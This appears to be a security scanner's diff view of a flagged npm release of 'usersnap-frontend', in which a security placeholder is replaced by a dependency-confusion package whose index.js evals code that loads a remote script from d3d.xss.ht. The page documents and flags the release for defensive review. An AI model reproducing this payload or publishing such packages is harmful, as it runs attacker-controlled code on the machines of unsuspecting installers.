usersnap-frontend 0.0.1-security → 3.3.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of usersnap-frontend might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +14 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://d3d.xss.ht\';document.body.appendChild(a)')
package/package.json CHANGED
@@ -1,6 +1,17 @@
1
1
  {
2
2
  "name": "usersnap-frontend",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "3.3.2",
4
+ "hacker": "d3d",
5
+ "email": "info@malicious.group",
6
+ "twitter": "@MCoetus",
7
+ "hackerone": "maliciousgroup",
8
+ "bugcrowd": "d3d",
9
+ "intigriti": "d3d",
10
+ "description": "This is a module created by d3d (@MCoetus) to show a Dependency Confusion bug in your network leading to a RCE in most cases. Contact me (info@malicious.group) this is ONLY for bug bounties and not actually a malicious package, but MAY break your builds.",
11
+ "main": "index.js",
12
+ "scripts": {
13
+ "test": "echo \"Error: no test specified - this is a bug hunting test from malicious.group\" && exit 1"
14
+ },
15
+ "author": "d3d (@MCoetus)",
16
+ "license": "ISC"
6
17
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=usersnap-frontend for more information.